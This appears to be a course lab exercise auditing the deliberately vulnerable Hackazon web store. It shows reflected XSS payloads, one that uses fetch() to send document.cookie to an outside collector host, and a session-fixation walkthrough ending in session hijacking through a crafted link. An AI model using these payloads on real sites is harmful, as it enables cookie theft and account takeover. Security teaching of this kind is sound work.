W 230: Manual Audit of Hackazon (20 pts)

What You Need

Purpose

To practice finding and exploiting several common Web vulnerabilities. I am following this blog.

1. Reflected XSS in Search Function

User Input Handling

In Firefox, go to

https://hackazons.samsclass.info/

Search for

shoes
No results are found, but the query "shoes" appears in the results page, as shown below.

When data from the user is echoed back on a Web page, if it's not sanitized, it can contain scripts, causesing a reflected XSS vulnerability.

Simple Proof-of-Concept

To test for that, search for
shoes<script>alert(1);</script>
An alert box pops up, as shown below.

Note: some browsers block such injections. When I did this on a Mac on Feb 6, 2020, the pop-up appeared in Brave, Opera, Firefox, and Chrome, but not in Safari.

Revealing a Cookie

Search for
shoes<script>alert(document.cookie);</script>
An alert box pops up, showing cookie values, as shown below. as shown below.

Viewing a Product

In the Hackazon page, click OK to close the pop-up box.

At the top left, click the red HACKAZON logo to return to the home page.

Click a product to view it, as shown below.

Flag W 230.1: Stealing Cookies (10 pts)

In the Hackazon page, search for
<script>fetch("https://attack32.samsclass.info/dataview.php?data=" + document.cookie);</script>

In a browser, go to this page, which records the data it receives:

https://attack32.samsclass.info/tmp/data.txt

Your stolen cookie appears at the end of the list.

The flag is covered by a green box in the image below.

2. Session Fixation

Making a Test Account

In the Hackazon page, at the top right, click "Sign Up".

Click the "New User?" button.

Fill in the form to create an account with any username and password you can remember. Click Register.

At the top right, click Logout.

Opening the Web Console

In Firefox, at the top right, click the three-bar "hamburger" icon, point to "Web Developer", and click "Web Console".

A command line appears at the bottom of the screen, with a >> prompt.

Viewing Cookies

In the Web Console, execute this command:
console.log(document.cookie)
The PHPSESSID value appears, as shown below.

Logging In

In Firefox, in the Hackazon page, at the top right, click "Sign In".

Sign in with the username and password you chose earlier.

In the Web Console, execute this command:

console.log(document.cookie)
As shown below, the cookie value is the same as it was before you logged in.

This is an unsafe procedure: to use the same cookie value for an unauthenticated session and an authenticated session. When combined with an XSS vulnerability, it allows account takeover, which we'll do below.

Changing a Cookie's Value

In the Web Console, execute these commands:
document.cookie = "PHPSESSID=123"
console.log(document.cookie)
The PHPSESSID value changes to "123", as shown below.

Refreshing the Hackazon Page

in Firefox, at the top left, click the curved-arrow icon to refresh the page.

You see a login page, as shown below. Changing the PHPSESSID value made Hackazon forget who you were.

Logging In

Log in to Hackazon again, with the username and password you chose earlier.

In the Web Console, execute this command:

console.log(document.cookie)
Notice that the cookie value is still "123". We can specify any session ID value and the server will use it.

Crafting a Malicious URL

In Hackazon, execute this search:
<script>document.cookie="PHPSESSID=555"</script>
In Firefox, copy the URL from the address bar, as shown below.

In the Web Console, execute this command:

console.log(document.cookie)
The PHPSESSIONID is now 555, as shown below.

Refreshing the Hackazon Page

in Firefox, at the top left, click the curved-arrow icon to refresh the page.

The top right now shows "Sign In/Sign Up", indicating that you are now logged out, as shown below.

Social Engineering

Now imagine you are sending this URL to a target individual via email. To simulate that, open a different browser, such as Chrome.

Paste in the URL you just copied.

Chrome shows a Hackazon page, as shown below.

In Chrome, at the top right, click "Sign In".

Sign in with the username and password you chose earlier.

Opening the Hackazon Home Page in Firefox

In Firefox, at the top lect, click the Hackazon logo. You are now logged in, as shown below. You have hijacked a session from the Chrome user!

Flag W 230.2: Fixed Cookie (10 pts)

In Firefox, in the Web Console, execute this command:
console.log(document.cookie)
The flagĀ is the PHPSESSID value, covered by a green box in the image below.

Sources

Hacking Hackazon

Posted 2-6-2020
Second task added 6-13-2020